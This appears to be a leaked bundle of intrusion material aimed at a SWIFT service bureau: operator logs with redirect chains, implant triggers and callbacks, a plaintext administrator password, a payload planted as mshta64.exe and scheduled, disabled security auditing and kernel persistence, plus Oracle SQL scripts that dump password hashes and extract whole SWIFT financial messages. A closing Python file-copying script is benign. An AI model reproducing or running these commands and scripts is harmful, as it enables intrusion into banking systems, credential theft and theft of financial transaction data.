+    REPLY from 192.168.219.246 -> 192.168.208.11 -- TTL: 128
+        ---------------------------------------------------------------------
+        ENSBDFTP2           UNIQUE REGISTERED        Workstation Service
+        WORKGROUP           GROUP REGISTERED         Domain Name
+        ENSBDFTP2           UNIQUE REGISTERED        File Server Service
+
+        Adapter Address: 00.24.81.a7.4b.06
+        Adapter Type   : Ethernet Adapter
+    
+    REPLY from 192.168.219.245 -> 192.168.208.11 -- TTL: 128
+        ---------------------------------------------------------------------
+        ENSBDFTP1           UNIQUE REGISTERED        Workstation Service
+        WORKGROUP           GROUP REGISTERED         Domain Name
+        ENSBDFTP1           UNIQUE REGISTERED        File Server Service
+
+        Adapter Address: 00.17.a4.77.28.34
+        Adapter Type   : Ethernet Adapter    
+    
+    172.16.104.17 - no bueno
+    
+6:47 PM 9/4/2013 - trace to pitch
+    1  192.168.206.4  1ms
+    2  80.227.254.194  1ms
+    3  213.132.54.52  2ms
+    4  172.16.216.69  2ms
+    5  10.100.34.97  3ms
+    6  10.100.34.78  4ms
+    7  10.100.34.98  7ms
+    8  10.44.247.93  8ms
+    9  94.201.0.53  9ms
+    10  10.44.24.146  177ms
+    11  212.113.15.65  151ms
+    12  4.69.166.157  152ms
+    13  4.69.153.133  152ms
+    14  4.69.148.190  149ms
+    15  4.69.140.30  160ms
+    16  4.69.154.201  147ms
+    17  212.162.4.6  154ms
+    18  188.1.144.101  197ms
+    19  188.1.144.185  168ms
+    20  188.1.50.10  174ms
+    21  141.57.252.1  168ms
+    22  139.18.13.2  169ms
+    
+    REPLY from 192.168.200.230 -> 192.168.208.11 -- TTL: 128
+        ---------------------------------------------------------------------
+        ENDPGBTS2           UNIQUE REGISTERED        Workstation Service
+        ENSB                GROUP REGISTERED         Domain Name
+        ENDPGBTS2           UNIQUE REGISTERED        File Server Service
+        ENSB                GROUP REGISTERED         Browser Service Elections
+
+        Adapter Address: 00.1e.0b.4b.9d.88
+        Adapter Type   : Ethernet Adapter
+    
+9:25 PM 9/4/2013 - hour clear, Q&D    
+    
+192.168.200.92
+--------------
+win2k8 R2 Standard
+Symantec Endpoint Protection 11
+8,0 CB 39781 10001288e
+
+5:25 PM 9/4/2013 - trigger sent
+5:29 PM 9/4/2013 - nothing, changing CB ip
+5:32 PM 9/4/2013 - got CB
+    Process Id : 576
+    \____ running out of services.exe
+    
+    Uptime: 4 days, 12:54:11
+    
+    - Memory Load       : 58%%
+    - Physical Available: 5095 M
+    - Physical Total    : 12285 M
+    
+    | Drive |  Serial   | Type  |    In use (MB)     | Change (MB) |
+    +-------+-----------+-------+--------------------+-------------+
+    | C     | 6e60-26bc | Fixed | 33264/40975 (81%%) |           0 |
+    | D     | 48ec-6c42 | Fixed | 5075/40978 (12%%)  |           0 |
+    | E     | 600b-29de | Fixed | 13698/61461 (22%%) |           0 |
+    | F     | 3263-9842 | Fixed | 2425/30740 (7%%)   |           0 |
+    | G     | 5e25-fad9 | Fixed | 11623/19699 (59%%) |           0 |
+    | I     | 8277-8c5f | Fixed | 23404/92199 (25%%) |           0 |
+
+5:47 PM 9/4/2013 - hour clear, survey done   
+8:13 PM 9/4/2013 - Upgrading SOTI
+
+    kisu_install -type MOAN
+    kisu_uninstall -type MOAN
+    
+8:46 PM 9/4/2013 - hour clear, Q&D
+
+192.168.200.104
+---------------
+win2k8 r2 sp0 64bit
+Symantec Endpoint Protection 11
+8,0 CB 49562 0x1000125b8
+5:53 PM 9/4/2013 - trigger sent
+5:54 PM 9/4/2013 - got CB
+    Process Id : 592
+    \____ running out of services.exe
+    
+    Uptime: 4 days, 14:32:5
+    
+    - Memory Load       : 48%%
+    - Physical Available: 8518 M
+    - Physical Total    : 16381 M
+    
+    | Drive |  Serial   | Type  |    In use (MB)     | Change (MB) |
+    +-------+-----------+-------+--------------------+-------------+
+    | C     | 6e60-26bc | Fixed | 27273/40975 (66%%) |           0 |
+    | D     | b473-6b76 | Fixed | 5909/40959 (14%%)  |           0 |
+    | E     | 44a0-05eb | Fixed | 23869/92159 (25%%) |           0 |
+    | F     | 88b0-6f4d | Fixed | 11994/46073 (26%%) |           0 |
+    | G     | 0c16-8579 | Fixed | 7058/19811 (35%%)  |           0 |
+    | H     | a8c8-e176 | Fixed | 1574/46076 (3%%)   |           0 |
+    
+6:08 PM 9/4/2013 - ran checks, survey done
+8:12 PM 9/4/2013 - Upgrading SOTI
+
+    kisu_install -type MOAN
+    kisu_uninstall -type MOAN
+
+8:45 PM 9/4/2013 - hour clear, Q&D    
+    
+192.168.219.245
+---------------
+w2k8 64bit
+Symantec EP11
+8,0 CB 36176
+6:28 PM 9/4/2013 - sent
+    Process Id : 580
+    \_____ running out of services.exe
+    
+    Uptime: 4 days, 13:54:14
+    
+    - Memory Load       : 19%%
+    - Physical Available: 6578 M
+    - Physical Total    : 8189 M
+    
+    | Drive |  Serial   | Type  |    In use (MB)     | Change (MB) |
+    +-------+-----------+-------+--------------------+-------------+
+    | C     | 7e21-d059 | Fixed | 21184/40975 (51%%) |           0 |
+    | D     | 1087-f9ee | Fixed | 4220/20489 (20%%)  |           0 |
+    | E     | dc06-2ba9 | Fixed | 26760/56321 (47%%) |           0 |
+    | F     | ec0c-3499 | Fixed | 90/15394 (0%%)     |           0 |
+    | G     | 26ff-0963 | Fixed | 1685/6786 (24%%)   |           0 |
+    
+6:41 PM 9/4/2013 - hour clear, survey done
+8:09 PM 9/4/2013 - Upgrading SOTI:
+
+    kisu_install -type MOAN
+    kisu_uninstall -type MOAN
+    
+9:15 PM 9/4/2013 - hour clear, Q&D

swift/VPNFW_Plan.txt

@@ -0,0 +1,304 @@
+ISP:	LK
+City:	
+Phone:	
+ISP IP:	69.64.59.133
+Source IP:	
+FINAL target IP:	
+Ops Machine:	LOCALHOST.LOCALDOMAIN
+Redirecting Method 1:	PITCHIMPAIR
+Redirect Host 1:	212.19.128.4
+Redirect Target 1:	80.227.254.202
+Redirecting Method 2:	INCISION
+Redirect Host 2:	80.227.254.202
+Redirect Target 2:	192.168.206.110
+Redirecting Method 3:	INCISION
+Redirect Host 3:	192.168.206.110
+Redirect Target 3:	192.168.200.51
+
+
+BEGIN UNIX OPNOTES:
+
+Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
+--> 212.19.128.4           ns.itte.kz                     pitchimpair          unix      successful    
+---> 80.227.254.202        ensbdvpn1.festivalcity.net.ae  jeepflea_market      firewall  successful    
+----> 192.168.206.110      ensbdmgmt1.eastnets.com        jeepflea_market      windows   successful    
+-----> 192.168.200.51      ensbdsl1.eastnets.com          jeepflea_market      windows   successful    
+Ops Machine: WO-CBX-LSR
+Results:
+
+==============
+212.19.128.4
+==============
+2012-07-02 19:10:51 UTC - ourtn -eY5U /current/up/noserver -wBIN 212.19.128.4
+2012-07-02 19:11:12 UTC - 1:11am  up 384 day(s),  8:08,  0 users,  load average: 0.12, 0.12, 0.12
+			  Tue Jul  3 01:11:22 GMT-6 2012
+			  Mon Jul  2 19:11:22 GMT 2012
+2012-07-02 19:13:27 UTC - checks good, moving on...
+
+-tunnel
+u 12742 80.227.254.202 12742 21385
+
+2012-07-02 21:52:48 UTC - bb
+
+=================
+80.227.254.202
+=================
+./BLIAR-2110 --lp 127.0.0.1 --implant 127.0.0.1 --idkey /current/bin/FW/OPS/jeepflea_market_80.227.254.202.ssg500.6.2.0r6.0.1341250568.key --sport 21385 --dport 12742
+2012-07-02 19:29:26 UTC - opened session with FW
+2012-07-02 19:29:32 UTC - uploading pktlk
+2012-07-02 19:31:24 UTC - created and opened tunnels
+
+                 ------------------Attacker------------------
+                         |                          ^
+                         v                          |
+     Attacker to Firewall Packet             Firewall to Attacker Packet
+     Source IP  :  212.19.128.4___           Source IP  :  80.227.254.201_
+     Dest   IP  :  80.227.254.201_           Dest   IP  :  212.19.128.4___
+     Source Port:  _____                     Source Port:  _____
+     Dest   Port:  _____                     Dest   Port:  _____
+                         |                          ^
+                         v   Iface Num: 1_______    |
+          -------------------------Firewall-------------------------
+                         |   Iface Num: 1_______    ^
+                         v                          |
+     Firewall to Target Packet               Target to Firewall Packet
+     Source IP  :  192.168.206.4__           Source IP  :  192.168.206.110
+     Dest   IP  :  192.168.206.110           Dest   IP  :  192.168.206.4__
+     Source Port:  _____                     Source Port:  _____
+     Dest   Port:  _____                     Dest   Port:  _____
+                         |                          ^
+                         v                          |
+                 -------------------Target-------------------
+
+2012-07-02 21:50:47 UTC - closed and removed tunnel
+2012-07-02 21:52:40 UTC - exited session
+
+
+PROJECT=JEEPFLEA_MARKET
+OPUSER=28366
+OPSCHEDULE=12062912151349
+SCRUBVER=6.006000029
+
+
+
+
+
+LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000029 20120702-1839
+###################
+SCRUBHANDS v6.006000029 (suite v6.6.0.29 run in /192.168.254.71) command line:
+:
+/usr/local/bin/scrubhands -t -S 12062912151349 -I 28366 -p JEEPFLEA_MARKET -n 69.64.44.50,69.64.44.20 69.64.59.133
+###################
+Final lines of bwmonitor.txt:
+
+Mon Jul  2 21:53:27 UTC 2012
+          RX packets:28141 errors:0 dropped:0 overruns:0 frame:0
+          RX bytes:9845872 (9.3 MiB)  TX bytes:10013872 (9.5 MiB)
+
+###################################################
+Project: JEEPFLEA_MARKET
+Date: 7:13 PM 7/2/2012
+
+### Lines to assist in automated processing
+# Un-comment the "Op Status" line (the line immediately below this one) to mark this op as unsuccessful
+#Op Status: Unsuccessful
+# Un-comment the "Non-Standard" line (the line immediately below this one) to mark this op as a non-standard
+#Non-Standard: True
+
+###################################################
+Targets:
+
+
+
+Results:
+
+================
+192.168.206.110
+================
+7:37 PM 7/2/2012 -           ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
+		Target Address    : 80.227.254.201
+		Source Address    : 212.19.128.4
+		Target Protocol   : ICMP
+		ICMP type,code    : 8,0
+		Keyfile           : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
+		Callback Address  : 192.168.206.4
+		Callback Dst Port : 34519
+		Callback Src Port : 0
+		Redirect through  : 192.168.254.71:555
+		Final Destination : 192.168.208.10
+		Id                : 0x0000000100010c30
+		Packet Trailer    : 0x3f46
+7:39 PM 7/2/2012 - win2k8 sp2
+7:39 PM 7/2/2012 - Uptime: 12 days, 19 hours, 14 minutes, 22 seconds
+		   Idle  : 12 days, 19 hours, 14 minutes, 25 seconds
+7:41 PM 7/2/2012 - unknown procs:
+D:\Program Files\Symantec\Backup Exec | LUGetUpdatesExe.exe -belongs to product Symantec Backup Exec? for Windows Servers 
+other unknown procs, previously researched.
+7:43 PM 7/2/2012 - PSP: Symantec Endpoint Protection | Symantec Corporation | 11.0.6005.562
+7:44 PM 7/2/2012 - Security auditing has been dorked.
+7:51 PM 7/2/2012 - winsurvey done, hour clean
+9:41 PM 7/2/2012 - final hour clean 
+9:46 PM 7/2/2012 - q & d
+
+
+
+
+
+==================
+192.168.200.51
+==================
+7:53 PM 7/2/2012 - ping timed out
+7:53 PM 7/2/2012 - ENSBDSL1            UNIQUE REGISTERED        Workstation Service
+	WORKGROUP           GROUP REGISTERED         Domain Name
+	ENSBDSL1            UNIQUE REGISTERED        File Server Service
+7:54 PM 7/2/2012 - NativeOS: Windows Server 2008 R2 Standard 7600
+7:56 PM 7/2/2012 - gonna try to ZB this guy
+7:56 PM 7/2/2012 - shares -target 192.168.200.51 -map C$ -credentials administrator ^enSBSX11^ "" -method netuse
+7:58 PM 7/2/2012 - unknown procs from pulist
+HV_Service.exe - Hypervisor Boot Driver by Microsoft
+8:14 PM 7/2/2012 - putting egg up on targ
+put D:\Logs\jeepflea_market\z0.0.0.1\Payloads\PeddleCheap_2012_07_02_20h00m10s\PC_Level3_exe.configured -name \\192.168.200.51\C$\windows\syswow64\mshta64.exe -permanent 
+scheduler -add 2 C:\windows\syswow64\mshta64.exe -target 192.168.200.51
+8:16 PM 7/2/2012 - BOOM!, got the callback
+8:17 PM 7/2/2012 - WIN2k8 sp 0 
+8:17 PM 7/2/2012 - Uptime: 11 days, 0 hours, 27 minutes, 55 seconds
+		   Idle  : 11 days, 0 hours, 27 minutes, 56 seconds
+8:18 PM 7/2/2012 - unknown procs:
+C:\Program Files (x86)\TurboFTP | TurboFTP.exe - TurboSoft, Inc. belonging to product TurboFTP Application.
+C:\Program Files (x86)\Symantec\Symantec Endpoint Protection | ProtectionUtilSurrogate.exe - related to Symantec
+D:\Double-Take\Service | CoreManagementService.exe - related to SWIFT service
+D:\Double-Take | DoubleTake.exe - Related to SWIFT services
+D:\Double-Take\Hyper-V | HV_Service.exe - Hypervisor Boot Driver by Microsoft
+8:23 PM 7/2/2012 - PSP:
+| Symantec Backup Exec Remote Agent for Windows Systems | Symantec Corporation |   12.5.2213   |
+|             Symantec Endpoint Protection              | Symantec Corporation | 11.0.6005.562 |
+|         LiveUpdate 3.3 (Symantec Corporation)         | Symantec Corporation |   3.3.0.96    |
+8:23 PM 7/2/2012 - Security auditing has been dorked.
+8:25 PM 7/2/2012 - unknown drivers:
+\SystemRoot\system32\DRIVERS | RepHsm.sys - belongs to product Double-Take, HSM Minifilter
+\SystemRoot\system32\DRIVERS | RepDac.sys - belongs to Double-Take, Access Minifilter
+\SystemRoot\system32\DRIVERS | RepDrv.sys - belongs to Double-Take, Replication Minifilter
+\SystemRoot\system32\DRIVERS | RepKap.sys - belongs to Double-Take, Kernel Access Provider Minifilter (x86).
+8:31 PM 7/2/2012 - - Memory Load       : 17%%
+8:33 PM 7/2/2012 - winsurvey done, hour clean
+9:06 PM 7/2/2012 - trying to install with KISU and FLAV
+9:06 PM 7/2/2012 - wtf....just dropped connection while trying to install...no bueno
+9:11 PM 7/2/2012 -  Security auditing has been dorked.
+9:13 PM 7/2/2012 - trying install one more time...blew up again
+9:14 PM 7/2/2012 - back up again
+9:20 PM 7/2/2012 - KISU_config=
+- KiSu Id:  0x7a43e1fa (PC)
+- Version:  2.1.8.8
+- Kernel Module Loader:
+-     Registry Key:  \registry\machine\SYSTEM\CurrentControlSet\Services\viaide\Parameters
+-     Registry Value:  {ECC6AAA2-D4B1-9937-2A3A-017CE482A890}
+- User Module Loader:
+-     Registry Key:  
+-     Registry Value:  
+- Module Store Directory:
+-     Registry Key:  \registry\machine\SYSTEM\CurrentControlSet\Services\ql2300\Parameters
+-     Registry Value:  {33A51B15-8DE5-3F99-1375-A07D75741CDF}
+- Launcher:
+-     Service Name:  secdrv
+-     Registry Value:  {ECC6AAA2-D4B1-9937-2A3A-017CE482A890}
+- 
+- Module Id         Size       Order      Flags    Name        Process
+- =====================================================================
+- 0xab3f907f       85504           0      U  EC    UserModuleLoader 64-Bit  
+- 0xbb397f34          20           0         ECL   Persistence Identifier  
+- 0xbb397f32       83456           0      U  EC    UserModuleLoader 32-Bit  
+- 0xbb397f33       83968           0    AD   EC    BroughtHotshot  
+-     B: BootStart,  S: SystemStart, A: AutoStart,      D: KernelDriver
+-     U: UserMode,   R: SystemMode,  K: ServiceKey,     E: Encrypted
+-     C: Compressed, L: DemandLoad,  O: AutoStart Once		
+
+9:20 PM 7/2/2012 - install failed :
+* File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss |  Line: 354
+*    Script terminated while running IF
+
+* File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss |  Line: 352
+*    Script terminated while running IF
+
+* File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss |  Line: 350
+*    Script terminated while running IF
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 382
+*    Failed to get first value for compare.
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 512
+*    Failed to get first value for compare.
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 476
+*    Script terminated while running IF
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 404
+*    Script terminated while running WHILE
+
+* File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss |  Line: 104
+*    Failed to get first value for compare.
+* Failed to run code!
+
+9:20 PM 7/2/2012 - trying one last time with no flav
+9:22 PM 7/2/2012 - tried connecting to KISU during install,
+* File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss |  Line: 518
+*    Script terminated while running IF
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 382
+*    Failed to get first value for compare.
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 512
+*    Failed to get first value for compare.
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 476
+*    Script terminated while running IF
+
+* File: D:\DSZOPSDisk\Resources\Dsz\Scripts\Include\_Menu.dsi |  Line: 404
+*    Script terminated while running WHILE
+
+* File: D:\DSZOPSDisk\Resources\Pc\Scripts\Install\winnt\_Install.dss |  Line: 104
+*    Failed to get first value for compare.
+* Failed to run code!
+
+
+9:29 PM 7/2/2012 - cutting my losses, q&d
+
+
+100011972
+
+
+
+
+####
+# Lines to assist in techsums
+# NOTEs and ERRORs will automatically generate a techsum
+# You can also enclose any portion of your opnotes in a <TECHSUM> </TECHSUM> block to have that section be included in the
+#   techsum automatically.  Like so:
+# <TECHSUM>
+# Bad things happened.
+# Then more bad things happened.
+# Then it _really_ got bad.
+# </TECHSUM>
+#  Please keep the <TECHSUM> and </TECHSUM> on separate lines
+#  Um...also, those angle brackets (< and >) are actually there, unlike the formats below
+####
+
+###################################################
+#
+# Create lines like the following (without #) to create targetnotes files
+# Targetnotes files are found in the <target IP> directory as targetnotes.txt; you can also create them directly.
+# They will be read to automate actions in future ops.
+#
+# General note to operators
+#NOTE (<target IP>): <here is my note>
+#
+# Do not run this command (it will cause problems on this box)
+#DONOTRUN (<target IP>): <command>
+#
+# This command caused an error (bring it to the attention of the developer)
+#ERROR (<target IP>): <command> <optional: what happened>
+#
+# This process runs all the time and is harmless
+#IGNORE (<target IP>): <executable name>
+#
+# This process was identified
+#ID: <process>=<label>

swift/initial_oracle_exploit.sql

@@ -0,0 +1,63 @@
+set termout on
+accept output_file_name prompt 'Enter Output File Name: '
+set termout off
+set pages 0
+set lines 256
+set long 4096
+set longc 4096
+set wrap on
+set recsep off
+set feedback off
+set verify off
+set trimspool on
+spool &&output_file_name
+prompt
+prompt USER$ Data
+prompt
+
+select '"name","account_status","password","spare4"' from dual;
+select '"'||name||'","'||account_status||'","'||u.password||'","'||spare4||'"' from user$ u, dba_users
+where spare4 is not null
+and username = name;
+
+prompt
+prompt V$SESSION Data
+prompt
+
+select '"username","schemaname","osuser","machine","terminal","program","type","logon_time","service_name","sql_trace"' from dual;
+select '"'||username||'","'||schemaname||'","'||osuser||'","'||machine||'","'||terminal||'","'||program||'","'||type||'","'||logon_time||'","'||service_name||'","'||sql_trace||'"' from v$session
+where username is not null ;
+
+prompt
+prompt DBA_SEGMENTS Data
+prompt
+
+select '"Total_MBytes"' from dual;
+select sum(bytes)/1024/1024 mbytes from dba_segments
+where owner = 'SAAOWNER'
+and (segment_name like 'MESG%'
+or segment_name like 'APPE%'
+or segment_name like 'TEXT%');
+
+prompt
+prompt SWIFT_DATES In Database
+prompt
+
+select '"SWIFT_Dates_In_Database"' from dual;
+select substr(table_name,6,20) SWIFT_Dates_In_Database
+from all_tables
+where owner = 'SAAOWNER'
+and table_name like 'MESG%'
+and table_name not like '%YYYYMMDD%'
+order by 1 desc
+/
+
+spool off
+set termout on
+prompt 
+prompt 
+prompt Done!
+prompt 
+prompt 
+prompt 
+exit

swift/swift_msg_queries_all.sql

@@ -0,0 +1,75 @@
+set pages 0
+set lines 1024
+set feedback off
+set trimspool on
+set verify off
+accept output_file_name prompt 'Enter Output File Name: '
+accept begin_date prompt 'Enter BEGINNING date in the format "yyyymmdd": '
+accept end_date prompt 'Enter ENDING date in the format "yyyymmdd": '
+prompt
+prompt
+prompt
+set termout off
+spool d41af8c_a.tmp
+select 'set long 4096' from dual;
+select 'set lines 1024' from dual;
+select 'set longc 4096' from dual;
+select 'set wrap on' from dual;
+select 'set recsep off' from dual;
+select 'set pages 0' from dual;
+select 'set feedback off' from dual;
+select 'set verify off' from dual;
+select 'set trimspool on' from dual;
+select 'spool &&output_file_name append' from dual;
+select 'select ''"SENDER_CC","RECEIVER_CC","MESG_S_UMID","SWIFT_MESSAGE"'' from dual;' from dual;
+select 'select ''"''||substr(mesg_sender_swift_address,5,2)||''","''||substr(mesg_receiver_swift_address,5,2)||''","''||mesg_s_umid||''","{1:F01''||decode(substr(m.mesg_uumid,1,1),''O'',mesg_receiver_swift_address,''I'',mesg_sender_swift_address,''OTHER'')||
+          ltrim((select to_char(appe_session_nbr,''0000'')||ltrim(to_char(appe_sequence_nbr,''000000'')) 
+           from saaowner.appe_'||substr(table_name,6,20)||' a 
+           where a.appe_s_umid = m.mesg_s_umid and a.appe_iapp_name = ''SWIFT'' and rownum = 1)) ||
+       ''}''||''{2:''||decode(substr(m.mesg_uumid,1,1),''O'',''O''||mesg_type||
+       ltrim((select to_char(TO_DATE (((TO_NUMBER (TO_CHAR (TO_DATE (''1970-01-01 00:00:00'', ''yyyy-mm-dd hh24:mi:ss''), ''J''), ''9999999'')) + 
+                                       ((appe_remote_input_time - (MOD (appe_remote_input_time, 86400))) / 86400)), ''J'') + 
+                                       ((MOD (appe_remote_input_time, 86400)) / 86400),''hh24mi'')||appe_remote_input_reference||
+       to_char(TO_DATE (((TO_NUMBER (TO_CHAR (TO_DATE (''1970-01-01 00:00:00'', ''yyyy-mm-dd hh24:mi:ss''), ''J''), ''9999999'')) + 
+                         ((appe_local_output_time - (MOD (appe_local_output_time, 86400))) / 86400)), ''J'') + 
+                         ((MOD (appe_local_output_time, 86400)) / 86400),''yymmddhh24mi'')
+           from saaowner.appe_'||substr(table_name,6,20)||' a  
+           where a.appe_s_umid = m.mesg_s_umid and a.appe_iapp_name = ''SWIFT'' and rownum = 1))
+       ||decode(m.mesg_network_priority,1,''S'',2,''U'',3,''N'',''N''),''I'',''I''||mesg_type||
+       mesg_receiver_swift_address||decode(m.mesg_network_priority,1,''S'',2,''U'',3,''N'',''N'')
+       ,''OTHER'')||''}{3:''||text_swift_block_3||
+       ''}{4:''||text_data_block||''
+-}{5:''||utl_raw.cast_to_varchar2(dbms_lob.substr(text_swift_block_5))||''}"'' SWIFT_MESSAGE
+from saaowner.text_'||substr(table_name,6,20)||' t ,saaowner.mesg_'||substr(table_name,6,20)||' m
+where
+m.mesg_s_umid = t.text_s_umid and
+text_swift_block_5 is not null;'||'
+spool off
+set termout on
+prompt date '||substr(table_name,6,8)||' completed.
+set termout off
+spool ''&&output_file_name'' append'
+from all_tables
+where owner = 'SAAOWNER'
+and table_name like 'MESG%' escape '\'
+and table_name not like '%YYYYMMDD%'
+and substr(table_name,6,8) >= '&&begin_date'
+and substr(table_name,6,8) <= '&&end_date'
+order by table_name
+/
+select 'spool off' from dual;
+spool off
+@d41af8c_a.tmp
+undefine begin_date
+undefine end_date
+undefine cc
+set termout on
+host del d41af8c_a.tmp
+prompt 
+prompt 
+prompt Done!
+prompt 
+prompt 
+prompt 
+exit
+

windows/CreateReplay.py

@@ -0,0 +1,158 @@
+
+import glob
+import os
+import shutil
+import sys
+import xml.dom.minidom
+
+#------------------------------------------------------------------------------------------
+# DOM helper functions
+#------------------------------------------------------------------------------------------
+def getMatchingChildNodes(node, name):
+	l = list()
+	for item in node.childNodes:
+		if (item.nodeType == node.ELEMENT_NODE) and (item.nodeName == name):
+			l.append(item)
+	return l
+	
+def getText(nodelist):
+    rc = ""
+    for node in nodelist:
+        if node.nodeType == node.TEXT_NODE:
+            rc = rc + node.data
+    return rc
+
+#------------------------------------------------------------------------------------------
+def copyFiles(files):
+
+	for item in files:
+		src = item[0]
+		dst = item[1]
+		#print "%s -> %s" % (src, dst)
+		try:
+			os.makedirs(os.path.dirname(dst))
+		except:
+			pass
+		
+		shutil.copy2(src, dst)
+	
+	return True
+
+#------------------------------------------------------------------------------------------
+def handleDir(dirName, dstDir, root, recursive=False):
+
+	#print "handleDir: ENTER (%s)" % dirName
+	fileList = list()
+	fileNodes = getMatchingChildNodes(root, "File")
+	for fileNode in fileNodes:
+		name = getText(fileNode.childNodes)			
+		if (fileNode.getAttribute("name")):
+			newName = fileNode.getAttribute("name")
+		else:
+			newName = None
+		
+		files = glob.glob("%s/%s" % (dirName, name))
+		for item in files:
+			item = os.path.basename(item)
+			dstName = newName
+			if (dstName == None):
+				dstName = item
+			if (len(dirName) > 0):
+				if (os.path.isfile("%s/%s" % (dirName, item))):
+					fileList.append(("%s/%s" % (dirName, item), "%s/%s/%s" % (dstDir, dirName, dstName)))
+			else:
+				if (os.path.isfile(item)):
+					fileList.append((item, "%s/%s" % (dstDir, dstName)))
+		
+	# handle any sub-dirs
+	if (recursive):
+		dirNodes = [root]
+	else:
+		dirNodes = getMatchingChildNodes(root, "Dir")
+	for dirNode in dirNodes:
+		if (recursive):
+			ignoreNodes = list()
+			if (len(dirName) > 0):
+				subDirName = "%s/*" % dirName
+			else:
+				subDirName = "*"
+		else:
+			ignoreNodes = getMatchingChildNodes(dirNode, "Ignore")
+			if (len(dirName) > 0):
+				subDirName = "%s/%s" % (dirName, dirNode.getAttribute("name"))
+			else:
+				subDirName = dirNode.getAttribute("name")
+		
+		subRecursive = recursive
+		if (not subRecursive):
+			rStr = dirNode.getAttribute("recursive")
+			if ((rStr != None) and (rStr == "true")):
+				subRecursive = True
+				#print "RECURSIVE (%s)" % subDirName
+					
+		#print "Checking for '%s'" % subDirName
+		names = glob.glob("%s" % subDirName)
+		for name in names:
+			if (os.path.basename(name) == ".svn"):
+				continue
+				
+			# make sure it's not ignored
+			ignore = False
+			for ignoreNode in ignoreNodes:
+				ignoreName = getText(ignoreNode.childNodes)
+				#print "<----------------Checking '%s' for ignored '%s'" % (os.path.basename(name), ignoreName)
+				if (ignoreName == os.path.basename(name)):
+					ignore = True
+			
+			if (ignore):
+				#print "IGNORING %s" % name
+				continue
+			
+			if (os.path.isdir(name)):
+				dirList = handleDir(os.path.normpath(name), dstDir, dirNode, subRecursive)
+				for item in dirList:
+					fileList.append(item)
+			
+	return fileList
+		
+#------------------------------------------------------------------------------------------
+def main(argv):
+
+#	rootDir = os.path.dirname(argv[0])
+#	if (len(rootDir) == 0):
+#		rootDir = "."
+#	xmlName = "%s/replay.xml" % rootDir
+	
+	rootDir = "."
+	xmlName = "%s/replay.xml" % rootDir
+	
+	dom1 = xml.dom.minidom.parse(xmlName)
+	root = dom1.getElementsByTagName("ReplayFiles")
+	
+	dstDir = None
+	while (dstDir == None):
+		dstDir = os.path.normpath("%s/../ReplayDisk" % rootDir)
+		sys.stdout.write("Enter the replay destination directory [%s]:" % dstDir)
+		dir = sys.stdin.readline().rstrip('\r\n')
+		if (len(dir) > 0):
+			dstDir = dir
+	
+	fileCopyList = list()
+	
+	rootList = handleDir(rootDir, dstDir, root[0])
+	for item in rootList:
+		fileCopyList.append(item)
+	
+	if (not copyFiles(fileCopyList)):
+		return False
+	
+	print "\n-----------------------------"
+	print "Replay disk creation complete"
+	print "-----------------------------"
+	return True
+	
+#------------------------------------------------------------------------------------------
+	
+if __name__ == '__main__':
+	if (main(sys.argv) != True):
+		sys.exit(-1);